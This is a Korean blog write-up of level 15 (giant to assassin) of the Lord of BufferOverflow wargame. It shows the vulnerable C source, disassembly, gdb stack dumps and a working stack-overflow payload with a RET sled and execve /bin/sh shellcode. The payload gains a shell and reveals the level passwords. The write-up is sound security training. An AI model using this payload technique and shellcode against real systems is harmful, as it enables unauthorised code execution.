본문 바로가기
Write-Up/LOB(lord of bufferoverflow)

[Lord Of BufferOverFlow] 15번 giant -> assassin

20's 2021. 3. 4. 02:02

login : giant

password : one step closer

/*
        The Lord of the BOF : The Fellowship of the BOF
        - assassin
        - no stack, no RTL
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer+sfp hunter
        memset(buffer, 0, 44);
}

 no stack, no RTL

RET sled이용

payload 는 a*44 + ret addr + shellcode

 

ret주소

0x80484ff <main+143>:   push   %eax
0x8048500 <main+144>:   push   $0x80485ae
0x8048505 <main+149>:   call   0x8048378 <printf>
0x804850a <main+154>:   add    $0x8,%esp
0x804850d <main+157>:   push   $0x2c
0x804850f <main+159>:   push   $0x0
0x8048511 <main+161>:   lea    0xffffffd8(%ebp),%eax
0x8048514 <main+164>:   push   %eax
0x8048515 <main+165>:   call   0x8048398 <memset>
0x804851a <main+170>:   add    $0xc,%esp
0x804851d <main+173>:   leave
0x804851e <main+174>:   ret
0x804851f <main+175>:   nop

0x804851e

 

(gdb) r `python -c 'print "a"*44 + "b"*4 + "c"*4 + "\x90"*100'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/test `python -c 'print "a"*44 + "b"*4 + "c"*4 + "\x90"*100'`

Breakpoint 1, 0x8048470 in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Breakpoint 2, 0x804851a in main ()
(gdb) x/1000x $esp
0xbffffa64:     0xbffffa70      0x00000000      0x0000002c      0x00000000
0xbffffa74:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa84:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa94:     0x00000000      0x00000000      0x62626262      0x63636363
0xbffffaa4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffab4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb04:     0x90909090      0xbffffd00      0xbffffd1d      0xbffffd3c
0xbffffb14:     0xbffffd47      0xbffffd55      0xbffffd96      0xbffffda7
0xbffffb24:     0xbffffdbc      0xbffffdcc      0xbffffdd7      0xbffffdf4
0xbffffb34:     0xbffffdff      0xbffffe10      0xbffffe20      0xbffffe28
0xbffffb44:     0x00000000      0x00000003      0x08048034      0x00000004
0xbffffb54:     0x00000020      0x00000005      0x00000006      0x00000006
0xbffffb64:     0x00001000      0x00000007      0x40000000      0x00000008
0xbffffb74:     0x00000000      0x00000009      0x080483c0      0x0000000b
0xbffffb84:     0x00000202      0x0000000c      0x00000202      0x0000000d
0xbffffb94:     0x00000202      0x0000000e      0x00000202      0x00000010
0xbffffba4:     0x0f8bfbff      0x0000000f      0xbffffbd3      0x00000000
0xbffffbb4:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbc4:     0x00000000      0x00000000      0x00000000      0x69000000
---Type <return> to continue, or q <return> to quit---
0xbffffbd4:     0x00363836      0x6d6f682f      0x69672f65      0x2f746e61
0xbffffbe4:     0x74736574      0x61616100      0x61616161      0x61616161
0xbffffbf4:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc04:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc14:     0x62626261      0x63636362      0x90909063      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x454c0090
0xbffffc84:     0x504f5353      0x7c3d4e45      0x7273752f      0x6e69622f
0xbffffc94:     0x73656c2f      0x70697073      0x68732e65      0x00732520

    0xbffffc44로 페이로드 작성

[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\x44\xfc\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒D▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒1Ұ
         ̀
bash$ whoami
assassin
bash$ my-pass
euid = 515
pushing me away

 

'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글

[Lord Of BufferOverFlow] 17번 zombie_assassin -> succubus  (0) 2021.03.06
[Lord Of BufferOverFlow] 16번 assassin -> zombie_assassin  (0) 2021.03.06
[Lord Of BufferOverFlow] 14번 bugbear -> giant  (0) 2021.03.04
[Lord Of BufferOverFlow] 13번 darkknight -> bugbear  (0) 2021.03.01
[Lord Of BufferOverFlow] 12번 golem -> darkknight  (0) 2021.03.01

'Write-Up/LOB(lord of bufferoverflow)' Related Articles

티스토리툴바